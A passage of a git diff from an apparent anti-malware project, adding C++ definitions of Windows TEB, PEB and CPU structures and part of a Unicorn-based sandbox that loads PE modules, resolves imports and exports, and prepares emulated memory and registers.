PlaceholderCompatibilityMode; //0x468 + CHAR PlaceholderCompatibilityModeReserved[7]; //0x469 + ULONG LeapSecondData; //0x470 + union + { + ULONG LeapSecondFlags; //0x474 + struct + { + ULONG SixtySecondEnabled : 1; //0x474 + ULONG Reserved : 31; //0x474 + }; + }; + ULONG NtGlobalFlag2; //0x478 +}; +static_assert(sizeof(X32PEB) == 0x480, "X64PEB Size check"); +//0x4e0 bytes (sizeof) +struct _GDI_TEB_BATCH32 +{ + ULONG Offset : 31; //0x0 + ULONG HasRenderingCommand : 1; //0x0 + ULONG HDC; //0x4 + ULONG Buffer[310]; //0x8 +}; +//0x18 bytes (sizeof) +struct _ACTIVATION_CONTEXT_STACK32 +{ + ULONG ActiveFrame; //0x0 + struct LIST_ENTRY32 FrameListCache; //0x4 + ULONG Flags; //0xc + ULONG NextCookieSequenceNumber; //0x10 + ULONG StackId; //0x14 +}; +//0x8 bytes (sizeof) +struct _CLIENT_ID32 +{ + 
ULONG UniqueProcess; //0x0 + ULONG UniqueThread; //0x4 +}; +//0x1000 bytes (sizeof) +struct X32TEB +{ + struct _NT_TIB32 NtTib; //0x0 + ULONG EnvironmentPointer; //0x1c + struct _CLIENT_ID32 ClientId; //0x20 + ULONG ActiveRpcHandle; //0x28 + ULONG ThreadLocalStoragePointer; //0x2c + ULONG ProcessEnvironmentBlock; //0x30 + ULONG LastErrorValue; //0x34 + ULONG CountOfOwnedCriticalSections; //0x38 + ULONG CsrClientThread; //0x3c + ULONG Win32ThreadInfo; //0x40 + ULONG User32Reserved[26]; //0x44 + ULONG UserReserved[5]; //0xac + ULONG WOW32Reserved; //0xc0 + ULONG CurrentLocale; //0xc4 + ULONG FpSoftwareStatusRegister; //0xc8 + ULONG ReservedForDebuggerInstrumentation[16]; //0xcc + ULONG SystemReserved1[26]; //0x10c + CHAR PlaceholderCompatibilityMode; //0x174 + UCHAR PlaceholderHydrationAlwaysExplicit; //0x175 + CHAR PlaceholderReserved[10]; //0x176 + ULONG ProxiedProcessId; //0x180 + struct _ACTIVATION_CONTEXT_STACK32 _ActivationStack; //0x184 + UCHAR WorkingOnBehalfTicket[8]; //0x19c + LONG ExceptionCode; //0x1a4 + ULONG ActivationContextStackPointer; //0x1a8 + ULONG InstrumentationCallbackSp; //0x1ac + ULONG InstrumentationCallbackPreviousPc; //0x1b0 + ULONG InstrumentationCallbackPreviousSp; //0x1b4 + UCHAR InstrumentationCallbackDisabled; //0x1b8 + UCHAR SpareBytes[23]; //0x1b9 + ULONG TxFsContext; //0x1d0 + struct _GDI_TEB_BATCH32 GdiTebBatch; //0x1d4 + struct _CLIENT_ID32 RealClientId; //0x6b4 + ULONG GdiCachedProcessHandle; //0x6bc + ULONG GdiClientPID; //0x6c0 + ULONG GdiClientTID; //0x6c4 + ULONG GdiThreadLocalInfo; //0x6c8 + ULONG Win32ClientInfo[62]; //0x6cc + ULONG glDispatchTable[233]; //0x7c4 + ULONG glReserved1[29]; //0xb68 + ULONG glReserved2; //0xbdc + ULONG glSectionInfo; //0xbe0 + ULONG glSection; //0xbe4 + ULONG glTable; //0xbe8 + ULONG glCurrentRC; //0xbec + ULONG glContext; //0xbf0 + ULONG LastStatusValue; //0xbf4 + struct _STRING32 StaticUnicodeString; //0xbf8 + WCHAR StaticUnicodeBuffer[261]; //0xc00 + ULONG DeallocationStack; //0xe0c + ULONG 
TlsSlots[64]; //0xe10 + struct LIST_ENTRY32 TlsLinks; //0xf10 + ULONG Vdm; //0xf18 + ULONG ReservedForNtRpc; //0xf1c + ULONG DbgSsReserved[2]; //0xf20 + ULONG HardErrorMode; //0xf28 + ULONG Instrumentation[9]; //0xf2c + struct _GUID ActivityId; //0xf50 + ULONG SubProcessTag; //0xf60 + ULONG PerflibData; //0xf64 + ULONG EtwTraceData; //0xf68 + ULONG WinSockData; //0xf6c + ULONG GdiBatchCount; //0xf70 + union + { + struct _PROCESSOR_NUMBER CurrentIdealProcessor; //0xf74 + ULONG IdealProcessorValue; //0xf74 + struct + { + UCHAR ReservedPad0; //0xf74 + UCHAR ReservedPad1; //0xf75 + UCHAR ReservedPad2; //0xf76 + UCHAR IdealProcessor; //0xf77 + }; + }; + ULONG GuaranteedStackBytes; //0xf78 + ULONG ReservedForPerf; //0xf7c + ULONG ReservedForOle; //0xf80 + ULONG WaitingOnLoaderLock; //0xf84 + ULONG SavedPriorityState; //0xf88 + ULONG ReservedForCodeCoverage; //0xf8c + ULONG ThreadPoolData; //0xf90 + ULONG TlsExpansionSlots; //0xf94 + ULONG MuiGeneration; //0xf98 + ULONG IsImpersonating; //0xf9c + ULONG NlsCache; //0xfa0 + ULONG pShimData; //0xfa4 + ULONG HeapData; //0xfa8 + ULONG CurrentTransactionHandle; //0xfac + ULONG ActiveFrame; //0xfb0 + ULONG FlsData; //0xfb4 + ULONG PreferredLanguages; //0xfb8 + ULONG UserPrefLanguages; //0xfbc + ULONG MergedPrefLanguages; //0xfc0 + ULONG MuiImpersonation; //0xfc4 + union + { + volatile USHORT CrossTebFlags; //0xfc8 + USHORT SpareCrossTebBits : 16; //0xfc8 + }; + union + { + USHORT SameTebFlags; //0xfca + struct + { + USHORT SafeThunkCall : 1; //0xfca + USHORT InDebugPrint : 1; //0xfca + USHORT HasFiberData : 1; //0xfca + USHORT SkipThreadAttach : 1; //0xfca + USHORT WerInShipAssertCode : 1; //0xfca + USHORT RanProcessInit : 1; //0xfca + USHORT ClonedThread : 1; //0xfca + USHORT SuppressDebugMsg : 1; //0xfca + USHORT DisableUserStackWalk : 1; //0xfca + USHORT RtlExceptionAttached : 1; //0xfca + USHORT InitialThread : 1; //0xfca + USHORT SessionAware : 1; //0xfca + USHORT LoadOwner : 1; //0xfca + USHORT LoaderWorker : 1; //0xfca + 
USHORT SkipLoaderInit : 1; //0xfca + USHORT SpareSameTebBits : 1; //0xfca + }; + }; + ULONG TxnScopeEnterCallback; //0xfcc + ULONG TxnScopeExitCallback; //0xfd0 + ULONG TxnScopeContext; //0xfd4 + ULONG LockCount; //0xfd8 + LONG WowTebOffset; //0xfdc + ULONG ResourceRetValue; //0xfe0 + ULONG ReservedForWdf; //0xfe4 + ULONGLONG ReservedForCrt; //0xfe8 + struct _GUID EffectiveContainerId; //0xff0 +}; +static_assert(sizeof(X32TEB) == 0x1000, "X32TEB Size check"); + +/* + x64的teb_64 32位的没做 +*/ +struct _ACTIVATION_CONTEXT_STACK { + struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* ActiveFrame; // 0x0 + struct _LIST_ENTRY FrameListCache; // 0x8 + ULONG Flags; // 0x18 + ULONG NextCookieSequenceNumber; // 0x1c + ULONG StackId; // 0x20 +}; +struct _GDI_TEB_BATCH { + ULONG Offset : 31; // 0x0 + ULONG HasRenderingCommand : 1; // 0x0 + ULONGLONG HDC; // 0x8 + ULONG Buffer[310]; // 0x10 +}; +struct _CLIENT_ID { + DWORD64 UniqueProcess; // 0x0 + DWORD64 UniqueThread; // 0x8 +}; +static_assert(sizeof(_CLIENT_ID) == 0x10, "_CLIENT_ID Size check"); + +static_assert(sizeof(_NT_TIB) == 0x38, "_NT_TIB Size check"); +typedef struct X64TEB { + struct _NT_TIB64 NtTib; // 0x0 + VOID* EnvironmentPointer; // 0x38 + struct _CLIENT_ID ClientId; // 0x40 + VOID* ActiveRpcHandle; // 0x50 + VOID* ThreadLocalStoragePointer; // 0x58 + struct X64PEB* ProcessEnvironmentBlock; // 0x60 + ULONG LastErrorValue; // 0x68 + ULONG CountOfOwnedCriticalSections; // 0x6c + VOID* CsrClientThread; // 0x70 + VOID* Win32ThreadInfo; // 0x78 + ULONG User32Reserved[26]; // 0x80 + ULONG UserReserved[5]; // 0xe8 + VOID* WOW32Reserved; // 0x100 + ULONG CurrentLocale; // 0x108 + ULONG FpSoftwareStatusRegister; // 0x10c + VOID* ReservedForDebuggerInstrumentation[16]; // 0x110 + VOID* SystemReserved1[30]; // 0x190 + CHAR PlaceholderCompatibilityMode; // 0x280 + UCHAR PlaceholderHydrationAlwaysExplicit; // 0x281 + CHAR PlaceholderReserved[10]; // 0x282 + ULONG ProxiedProcessId; // 0x28c + struct _ACTIVATION_CONTEXT_STACK 
_ActivationStack; // 0x290 + UCHAR WorkingOnBehalfTicket[8]; // 0x2b8 + LONG ExceptionCode; // 0x2c0 + UCHAR Padding0[4]; // 0x2c4 + struct _ACTIVATION_CONTEXT_STACK* ActivationContextStackPointer; // 0x2c8 + ULONGLONG InstrumentationCallbackSp; // 0x2d0 + ULONGLONG InstrumentationCallbackPreviousPc; // 0x2d8 + ULONGLONG InstrumentationCallbackPreviousSp; // 0x2e0 + ULONG TxFsContext; // 0x2e8 + UCHAR InstrumentationCallbackDisabled; // 0x2ec + UCHAR UnalignedLoadStoreExceptions; // 0x2ed + UCHAR Padding1[2]; // 0x2ee + struct _GDI_TEB_BATCH GdiTebBatch; // 0x2f0 + struct _CLIENT_ID RealClientId; // 0x7d8 + VOID* GdiCachedProcessHandle; // 0x7e8 + ULONG GdiClientPID; // 0x7f0 + ULONG GdiClientTID; // 0x7f4 + VOID* GdiThreadLocalInfo; // 0x7f8 + ULONGLONG Win32ClientInfo[62]; // 0x800 + VOID* glDispatchTable[233]; // 0x9f0 + ULONGLONG glReserved1[29]; // 0x1138 + VOID* glReserved2; // 0x1220 + VOID* glSectionInfo; // 0x1228 + VOID* glSection; // 0x1230 + VOID* glTable; // 0x1238 + VOID* glCurrentRC; // 0x1240 + VOID* glContext; // 0x1248 + ULONG LastStatusValue; // 0x1250 + UCHAR Padding2[4]; // 0x1254 + struct _UNICODE_STRING StaticUnicodeString; // 0x1258 + WCHAR StaticUnicodeBuffer[261]; // 0x1268 + UCHAR Padding3[6]; // 0x1472 + VOID* DeallocationStack; // 0x1478 + VOID* TlsSlots[64]; // 0x1480 + struct _LIST_ENTRY TlsLinks; // 0x1680 + VOID* Vdm; // 0x1690 + VOID* ReservedForNtRpc; // 0x1698 + VOID* DbgSsReserved[2]; // 0x16a0 + ULONG HardErrorMode; // 0x16b0 + UCHAR Padding4[4]; // 0x16b4 + VOID* Instrumentation[11]; // 0x16b8 + struct _GUID ActivityId; // 0x1710 + VOID* SubProcessTag; // 0x1720 + VOID* PerflibData; // 0x1728 + VOID* EtwTraceData; // 0x1730 + VOID* WinSockData; // 0x1738 + ULONG GdiBatchCount; // 0x1740 + union { + struct _PROCESSOR_NUMBER CurrentIdealProcessor; // 0x1744 + ULONG IdealProcessorValue; // 0x1744 + struct { + UCHAR ReservedPad0; // 0x1744 + UCHAR ReservedPad1; // 0x1745 + UCHAR ReservedPad2; // 0x1746 + UCHAR IdealProcessor; // 
0x1747 + }; + }; + ULONG GuaranteedStackBytes; // 0x1748 + UCHAR Padding5[4]; // 0x174c + VOID* ReservedForPerf; // 0x1750 + VOID* ReservedForOle; // 0x1758 + ULONG WaitingOnLoaderLock; // 0x1760 + UCHAR Padding6[4]; // 0x1764 + VOID* SavedPriorityState; // 0x1768 + ULONGLONG ReservedForCodeCoverage; // 0x1770 + VOID* ThreadPoolData; // 0x1778 + VOID** TlsExpansionSlots; // 0x1780 + VOID* DeallocationBStore; // 0x1788 + VOID* BStoreLimit; // 0x1790 + ULONG MuiGeneration; // 0x1798 + ULONG IsImpersonating; // 0x179c + VOID* NlsCache; // 0x17a0 + VOID* pShimData; // 0x17a8 + ULONG HeapData; // 0x17b0 + UCHAR Padding7[4]; // 0x17b4 + VOID* CurrentTransactionHandle; // 0x17b8 + struct _TEB_ACTIVE_FRAME* ActiveFrame; // 0x17c0 + VOID* FlsData; // 0x17c8 + VOID* PreferredLanguages; // 0x17d0 + VOID* UserPrefLanguages; // 0x17d8 + VOID* MergedPrefLanguages; // 0x17e0 + ULONG MuiImpersonation; // 0x17e8 + union { + volatile USHORT CrossTebFlags; // 0x17ec + USHORT SpareCrossTebBits : 16; // 0x17ec + }; + union { + USHORT SameTebFlags; // 0x17ee + struct { + USHORT SafeThunkCall : 1; // 0x17ee + USHORT InDebugPrint : 1; // 0x17ee + USHORT HasFiberData : 1; // 0x17ee + USHORT SkipThreadAttach : 1; // 0x17ee + USHORT WerInShipAssertCode : 1; // 0x17ee + USHORT RanProcessInit : 1; // 0x17ee + USHORT ClonedThread : 1; // 0x17ee + USHORT SuppressDebugMsg : 1; // 0x17ee + USHORT DisableUserStackWalk : 1; // 0x17ee + USHORT RtlExceptionAttached : 1; // 0x17ee + USHORT InitialThread : 1; // 0x17ee + USHORT SessionAware : 1; // 0x17ee + USHORT LoadOwner : 1; // 0x17ee + USHORT LoaderWorker : 1; // 0x17ee + USHORT SkipLoaderInit : 1; // 0x17ee + USHORT SpareSameTebBits : 1; // 0x17ee + }; + }; + VOID* TxnScopeEnterCallback; // 0x17f0 + VOID* TxnScopeExitCallback; // 0x17f8 + VOID* TxnScopeContext; // 0x1800 + ULONG LockCount; // 0x1808 + LONG WowTebOffset; // 0x180c + VOID* ResourceRetValue; // 0x1810 + VOID* ReservedForWdf; // 0x1818 + ULONGLONG ReservedForCrt; // 0x1820 + struct 
_GUID EffectiveContainerId; // 0x1828 +}; +static_assert(sizeof(X64TEB) == 0x1838, "TEB Size check"); +struct struct_gs_base { + char unk[0x30]; // 0x0 + uint64_t teb; // 0x30 + char unk2[0x28]; // 0x38 + uint64_t peb; // 0x60 +}; +/// See: Segment Descriptor +union SegmentDescriptor { + ULONG64 all; + struct { + ULONG64 limit_low : 16; + ULONG64 base_low : 16; + ULONG64 base_mid : 8; + ULONG64 type : 4; + ULONG64 system : 1; + ULONG64 dpl : 2; + ULONG64 present : 1; + ULONG64 limit_high : 4; + ULONG64 avl : 1; + ULONG64 l : 1; //!< 64-bit code segment (IA-32e mode only) + ULONG64 db : 1; + ULONG64 gran : 1; + ULONG64 base_high : 8; + } fields; +}; +/// @copydoc SegmentDescriptor +struct SegmentDesctiptorX64 { + SegmentDescriptor descriptor; + ULONG32 base_upper32; + ULONG32 reserved; +}; +// 每个系统的KPCR结构都不一样,懒了 +typedef struct _KPCR { + SegmentDesctiptorX64 gdt[8]; +} KPCR; + +#include +struct Idtr { + unsigned short limit; + ULONG_PTR base; +}; + +struct Idtr32 { + unsigned short limit; + ULONG32 base; +}; +static_assert(sizeof(Idtr32) == 6, "Size check"); +using Gdtr = Idtr; +#if defined(_AMD64_) +static_assert(sizeof(Idtr) == 10, "Size check"); +static_assert(sizeof(Gdtr) == 10, "Size check"); +#else +static_assert(sizeof(Idtr) == 6, "Size check"); +static_assert(sizeof(Gdtr) == 6, "Size check"); +#endif + +#include +union SegmentSelector { + unsigned short all; + struct { + unsigned short rpl : 2; //!< Requested Privilege Level + unsigned short ti : 1; //!< Table Indicator + unsigned short index : 13; + } fields; +}; +static_assert(sizeof(SegmentSelector) == 2, "Size check"); +#include + +union FlagRegister { + ULONG_PTR all; + struct { + ULONG_PTR cf : 1; //!< [0] Carry flag + ULONG_PTR reserved1 : 1; //!< [1] Always 1 + ULONG_PTR pf : 1; //!< [2] Parity flag + ULONG_PTR reserved2 : 1; //!< [3] Always 0 + ULONG_PTR af : 1; //!< [4] Borrow flag + ULONG_PTR reserved3 : 1; //!< [5] Always 0 + ULONG_PTR zf : 1; //!< [6] Zero flag + ULONG_PTR sf : 1; //!< [7] Sign 
flag + ULONG_PTR tf : 1; //!< [8] Trap flag + ULONG_PTR intf : 1; //!< [9] Interrupt flag + ULONG_PTR df : 1; //!< [10] Direction flag + ULONG_PTR of : 1; //!< [11] Overflow flag + ULONG_PTR iopl : 2; //!< [12:13] I/O privilege level + ULONG_PTR nt : 1; //!< [14] Nested task flag + ULONG_PTR reserved4 : 1; //!< [15] Always 0 + ULONG_PTR rf : 1; //!< [16] Resume flag + ULONG_PTR vm : 1; //!< [17] Virtual 8086 mode + ULONG_PTR ac : 1; //!< [18] Alignment check + ULONG_PTR vif : 1; //!< [19] Virtual interrupt flag + ULONG_PTR vip : 1; //!< [20] Virtual interrupt pending + ULONG_PTR id : 1; //!< [21] Identification flag + ULONG_PTR reserved5 : 10; //!< [22:31] Always 0 + } fields; +}; +struct moudle_export { + char name[MAX_PATH]; + uint64_t function_address; + void* function_callback; +}; +struct moudle_import { + char name[MAX_PATH]; + char dll_name[MAX_PATH]; + uint64_t function_address; + void* function_callback; + bool is_delayed_import; +}; +struct moudle_section { + char name[9]; + ULONG base; + ULONG size; + ULONG protect_flag; +}; +struct struct_handle_table { + uint64_t handle; // 值 + uint64_t type; // 对象类型 + uint64_t address; // 地址 + uint64_t authorization; // 权限 + uint64_t protect_flag; // 是否被保护 + char name[MAX_PATH]; // 名称 +}; +struct struct_moudle { + char name[MAX_PATH]; + uint64_t entry; + uint64_t base; + uint64_t size; + std::vector> import_function; + std::vector> export_function; + std::vector> sections; +}; +struct struct_process { + char ImageFileName[MAX_PATH]; // 名字 + struct_handle_table HandleTable; // 句柄表 + uint64_t DebugPort; // 一直为0谢谢 + uint64_t UniqueProcessId; // 进程id + uint64_t InheritedFromUniqueProcessId; // 父进程ID + X64PEB PebBaseAddress; // PEB 里面有ldr + uint64_t ExitStatus; // 终止状态 + uint64_t AffinityMask; // 关联掩码 + uint64_t BasePriority; // 优先级类 + uint64_t VadRoot; // VAD + std::vector moudle_list; // 模块列表 +}; + +typedef struct AllocBlock_s { + AllocBlock_s(ULONG64 b, ULONG s) : base(b), size(s) { free = false; } + ULONG64 base; + 
ULONG size; + bool free; +} AllocBlock_t; + +struct struct_params { + int type; // 类型 + char str[MAX_PATH]; // PARAMS_CHAR + wchar_t wstr[MAX_PATH]; // PARAMS_WCHAR + uint64_t uint; // PARAMS_UINT + int _int; // PARAMS_INT +}; +struct struct_process_trace_log { + time_t time; // 时间 + char function_name[MAX_PATH]; // 名字 + char moudle_name[MAX_PATH]; // 模块名字 + uint64_t function_address; // 地址 + uint64_t call_address; + int params_num; // 参数数量 + std::vector save_regs; // 各个寄存器状态 + std::vector save_params; // 各个参数值 +}; diff --git a/ai_anti_malware/sandbox.cpp b/ai_anti_malware/sandbox.cpp new file mode 100644 index 0000000..3bba904 --- /dev/null +++ b/ai_anti_malware/sandbox.cpp @@ -0,0 +1,575 @@ +#include "sandbox.h" +#include "sandbox_callbacks.h" +std::string getDllNameFromApiSetMap(const std::string& apiSet) { + const std::wstring wApiSet(apiSet.begin(), apiSet.end()); + + // 获取系统版本信息 + using RtlGetVersionFunc = LONG(__stdcall*)(PRTL_OSVERSIONINFOW); + const auto pRtlGetVersion = reinterpret_cast( + GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlGetVersion")); + + RTL_OSVERSIONINFOEXW verInfo{}; + verInfo.dwOSVersionInfoSize = sizeof(verInfo); + pRtlGetVersion(reinterpret_cast(&verInfo)); + + const ULONG verShort = (verInfo.dwMajorVersion << 8) | + (verInfo.dwMinorVersion << 4) | + verInfo.wServicePackMajor; + + if (verShort >= static_cast(WinVer::kWin10)) { + const auto apiSetMap = reinterpret_cast( + reinterpret_cast(__readgsqword(0x60))->ApiSetMap); + const auto apiSetMapAsNumber = reinterpret_cast(apiSetMap); + auto nsEntry = reinterpret_cast( + apiSetMap->Start + apiSetMapAsNumber); + + // 遍历API集合查找匹配项 + for (ULONG i = 0; i < apiSetMap->Count; i++) { + UNICODE_STRING nameString{}, valueString{}; + nameString.MaximumLength = static_cast(nsEntry->NameLength); + nameString.Length = static_cast(nsEntry->NameLength); + nameString.Buffer = reinterpret_cast(apiSetMapAsNumber + + nsEntry->NameOffset); + + const std::wstring name(nameString.Buffer, + nameString.Length / 
sizeof(WCHAR)); + const std::wstring fullName = name + L".dll"; + + if (_wcsicmp(wApiSet.c_str(), fullName.c_str()) == 0) { + if (nsEntry->ValueCount == 0) { + return ""; + } + + const auto valueEntry = + reinterpret_cast( + apiSetMapAsNumber + nsEntry->ValueOffset); + valueString.Buffer = reinterpret_cast( + apiSetMapAsNumber + valueEntry->ValueOffset); + valueString.MaximumLength = + static_cast(valueEntry->ValueLength); + valueString.Length = + static_cast(valueEntry->ValueLength); + + const std::wstring value(valueString.Buffer, + valueString.Length / sizeof(WCHAR)); + return {value.begin(), value.end()}; + } + ++nsEntry; + } + } else { + // 不支持Windows 10以下版本 + throw std::runtime_error("Unsupported Windows version"); + } + return ""; +} + +class ImportResolver : public peconv::t_function_resolver { + public: + explicit ImportResolver(std::map context) + : _functionMap(std::move(context)) {} + + FARPROC resolve_func(LPSTR libName, LPSTR funcName) override { + return reinterpret_cast(_functionMap[std::string(funcName)]); + } + + private: + std::map _functionMap; +}; + +class cListImportNames : public peconv::ImportThunksCallback { + public: + cListImportNames(BYTE* _modulePtr, size_t _moduleSize, + std::vector>& name_to_addr) + : ImportThunksCallback(_modulePtr, _moduleSize), + nameToAddr(name_to_addr) {} + + virtual bool processThunks(LPSTR lib_name, ULONG_PTR origFirstThunkPtr, + ULONG_PTR firstThunkPtr) { + if (this->is64b) { + IMAGE_THUNK_DATA64* desc = + reinterpret_cast(origFirstThunkPtr); + ULONGLONG* call_via = reinterpret_cast(firstThunkPtr); + return processThunks_tpl( + lib_name, desc, call_via, IMAGE_ORDINAL_FLAG64); + } + IMAGE_THUNK_DATA32* desc = + reinterpret_cast(origFirstThunkPtr); + DWORD* call_via = reinterpret_cast(firstThunkPtr); + return processThunks_tpl( + lib_name, desc, call_via, IMAGE_ORDINAL_FLAG32); + } + + protected: + template + bool processThunks_tpl(LPSTR lib_name, T_IMAGE_THUNK_DATA* desc, + T_FIELD* call_via, T_FIELD 
ordinal_flag) { + DWORD call_via_rva = static_cast((ULONG_PTR)call_via - + (ULONG_PTR)this->modulePtr); + LPSTR func_name = NULL; + if ((desc->u1.Ordinal & ordinal_flag) == 0) { + PIMAGE_IMPORT_BY_NAME by_name = + (PIMAGE_IMPORT_BY_NAME)((ULONGLONG)modulePtr + + desc->u1.AddressOfData); + func_name = reinterpret_cast(by_name->Name); + std::string fuck_up_api_ms = lib_name; + if (fuck_up_api_ms.find("api-ms-") != std::string::npos) { + fuck_up_api_ms = getDllNameFromApiSetMap(fuck_up_api_ms); + if (fuck_up_api_ms.size() <= 1) __debugbreak(); + } + auto import_data = std::make_shared(); + memcpy(import_data->name, func_name, strlen(func_name)); + memcpy(import_data->dll_name, fuck_up_api_ms.c_str(), + fuck_up_api_ms.size()); + import_data->function_address = call_via_rva; + import_data->is_delayed_import = false; + nameToAddr.push_back(import_data); + } + return true; + } + + std::vector>& nameToAddr; +}; + +Sandbox::Sandbox() {} + +Sandbox::~Sandbox() {} + +auto Sandbox::PushModuleToVM(const char* dllName, uint64_t moduleBase, + uint32_t x32Base) -> void { + // 检查模块是否已加载 + auto isModuleLoaded = + std::any_of(m_moduleList.begin(), m_moduleList.end(), + [moduleBase](std::shared_ptr module) { + return module->base == moduleBase; + }); + + if (isModuleLoaded) { + std::cout << "[PE] Skipping " << dllName << " (already loaded)\n"; + return; + } + + // 解析PE头 + auto* dosHeader = reinterpret_cast(moduleBase); + auto* ntHeaders = reinterpret_cast( + reinterpret_cast(moduleBase) + dosHeader->e_lfanew); + + // 获取区段对齐值 + DWORD sectionAlignment = + (ntHeaders->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) + ? 
reinterpret_cast(ntHeaders) + ->OptionalHeader.SectionAlignment + : ntHeaders->OptionalHeader.SectionAlignment; + + // 获取区段头 + auto* sectionHeader = reinterpret_cast( + reinterpret_cast(ntHeaders) + sizeof(ntHeaders->Signature) + + sizeof(ntHeaders->FileHeader) + + ntHeaders->FileHeader.SizeOfOptionalHeader); + + // 创建新模块 + struct_moudle newModule{}; + strncpy(newModule.name, dllName, strlen(dllName)); + newModule.base = this->m_peInfo->isX64 ? moduleBase : x32Base; + newModule.entry = ntHeaders->OptionalHeader.AddressOfEntryPoint; + newModule.size = ntHeaders->OptionalHeader.SizeOfImage; + + // 处理区段 + for (WORD i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++) { + const auto& section = sectionHeader[i]; + + // if (!(section.Characteristics & + // (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE))) { + // continue; + // } + + // 设置区段保护属性 + int protection = UC_PROT_READ; + if (section.Characteristics & IMAGE_SCN_MEM_EXECUTE) + protection |= UC_PROT_EXEC; + if (section.Characteristics & IMAGE_SCN_MEM_WRITE) + protection |= UC_PROT_WRITE; + + // 计算区段大小 + auto sectionSize = + AlignSize(max(section.Misc.VirtualSize, section.SizeOfRawData), + sectionAlignment); + + // 创建区段信息 + moudle_section newSection{}; + strncpy(newSection.name, reinterpret_cast(section.Name), + 8); + newSection.base = section.VirtualAddress; + newSection.size = sectionSize; + newSection.protect_flag = protection; + + newModule.sections.push_back( + std::make_shared(newSection)); + std::cout << "[PE] " << dllName << " Section found: " << newSection.name + << '\n'; + } + m_moduleList.push_back(std::make_shared(newModule)); + uc_mem_map(m_ucEngine, moduleBase, newModule.size, + UC_PROT_READ | UC_PROT_EXEC); + uc_mem_write(m_ucEngine, moduleBase, (void*)moduleBase, newModule.size); +} + +auto Sandbox::ResolveExport() -> void { + DWORD exportSize = 0; + static RtlImageDirectoryEntryToDataFn fnRtlImageDirectoryEntryToData; + if (fnRtlImageDirectoryEntryToData == nullptr) { + fnRtlImageDirectoryEntryToData 
= + reinterpret_cast(GetProcAddress( + GetModuleHandleA("ntdll.dll"), "RtlImageDirectoryEntryToData")); + } + // 获取导出表 + PIMAGE_EXPORT_DIRECTORY exportDirectory = + static_cast(fnRtlImageDirectoryEntryToData( + m_peInfo->peBuffer, TRUE, IMAGE_DIRECTORY_ENTRY_EXPORT, + &exportSize)); + + if (exportDirectory) { + const DWORD numberOfNames = exportDirectory->NumberOfNames; + PDWORD addressOfFunctions = + reinterpret_cast(static_cast(m_peInfo->peBuffer) + + exportDirectory->AddressOfFunctions); + PDWORD addressOfNames = + reinterpret_cast(static_cast(m_peInfo->peBuffer) + + exportDirectory->AddressOfNames); + PWORD addressOfNameOrdinals = + reinterpret_cast(static_cast(m_peInfo->peBuffer) + + exportDirectory->AddressOfNameOrdinals); + + // 遍历导出函数 + for (size_t i = 0; i < numberOfNames; i++) { + PCHAR functionName = reinterpret_cast( + static_cast(m_peInfo->peBuffer) + addressOfNames[i]); + + // 获取函数RVA + const DWORD functionRva = + addressOfFunctions[addressOfNameOrdinals[i]]; + + // 创建导出数据结构 + moudle_export exportData{}; + memcpy(exportData.name, functionName, strlen(functionName)); + exportData.function_address = functionRva; + + m_exportFuncDict.push_back( + std::make_shared(exportData)); + } + } +} + +auto Sandbox::processImportModule(const moudle_import* importModule) -> void { + // 构建模块路径 + const std::string systemDir = + m_peInfo->isX64 ? 
"\\System32\\" : "\\SysWOW64\\"; + char windowsPath[MAX_PATH]; + if (!GetWindowsDirectoryA(windowsPath, sizeof(windowsPath))) { + throw std::runtime_error("Failed to get Windows directory"); + } + + const std::string modulePath = + std::string(windowsPath) + systemDir + importModule->dll_name; + + // 加载PE模块 + size_t mappedPeSize = 0; + const auto moduleBase = reinterpret_cast( + peconv::load_pe_module(modulePath.c_str(), mappedPeSize, false, false)); + + if (!moduleBase) { + return; + } + + // 添加到虚拟机 + const auto moduleBase32 = static_cast(moduleBase); + PushModuleToVM(importModule->dll_name, moduleBase, moduleBase32); +} +auto Sandbox::ResoveImport() -> void { + // 处理延迟导入 + peconv::load_delayed_imports(static_cast(m_peInfo->peBuffer), 0); + + // 解析导入表 + cListImportNames importCallback(static_cast(m_peInfo->peBuffer), + m_peInfo->peSize, m_impFuncDict); + + if (!peconv::process_import_table(static_cast(m_peInfo->peBuffer), + m_peInfo->peSize, &importCallback)) { + throw std::runtime_error("Failed to process import table"); + } + + // 处理每个导入模块 + for (const auto& importModule : m_impFuncDict) { + processImportModule(importModule.get()); + } +} +auto Sandbox::SetupVirtualMachine() -> void { + SegmentSelector cs = {0}; + cs.fields.index = 1; + uc_reg_write(m_ucEngine, UC_X86_REG_CS, &cs.all); + + SegmentSelector ds = {0}; + ds.fields.index = 2; + uc_reg_write(m_ucEngine, UC_X86_REG_DS, &ds.all); + + SegmentSelector ss = {0}; + ss.fields.index = 2; + uc_reg_write(m_ucEngine, UC_X86_REG_SS, &ss.all); + + SegmentSelector es = {0}; + es.fields.index = 2; + uc_reg_write(m_ucEngine, UC_X86_REG_ES, &es.all); + + SegmentSelector gs = {0}; + gs.fields.index = 2; + uc_reg_write(m_ucEngine, UC_X86_REG_GS, &gs.all); + + FlagRegister eflags = {0}; + eflags.fields.id = 1; + eflags.fields.intf = 1; + eflags.fields.reserved1 = 1; + + uc_reg_write(m_ucEngine, UC_X86_REG_EFLAGS, &eflags.all); + + uint64_t cr8 = 0; + uc_reg_write(m_ucEngine, UC_X86_REG_CR8, &cr8); + + /* + 映射 
m_KSharedUserDataBase + */ + uint64_t m_KSharedUserDataBase = 0x7FFE0000; + uint64_t m_KSharedUserDataEnd = 0x7FFE0FFF; // 0x7FFE2000 + uint64_t m_KSharedUserDataSize = + AlignSize(m_KSharedUserDataEnd - m_KSharedUserDataBase, PAGE_SIZE); + + uc_mem_map(m_ucEngine, m_KSharedUserDataBase, m_KSharedUserDataSize, + UC_PROT_READ); + uc_mem_write(m_ucEngine, m_KSharedUserDataBase, + (void*)m_KSharedUserDataBase, m_KSharedUserDataSize); + + m_tebBase = TEB_BASE; // 进程TEB地址 + m_pebBase = PEB_BASE; // 进程PEB地址 + // stack + m_stackBase = this->m_peInfo->isX64 ? STACK_BASE_64 : STACK_BASE_32; + m_stackSize = this->m_peInfo->isX64 ? STACK_SIZE_64 : STACK_SIZE_32; + m_stackEnd = m_stackBase + m_stackSize; + + // heap + m_heapBase = this->m_peInfo->isX64 ? HEAP_ADDRESS_64 : HEAP_ADDRESS_32; + m_heapSize = this->m_peInfo->isX64 ? HEAP_SIZE_64 : HEAP_SIZE_32; + m_heapEnd = m_heapBase 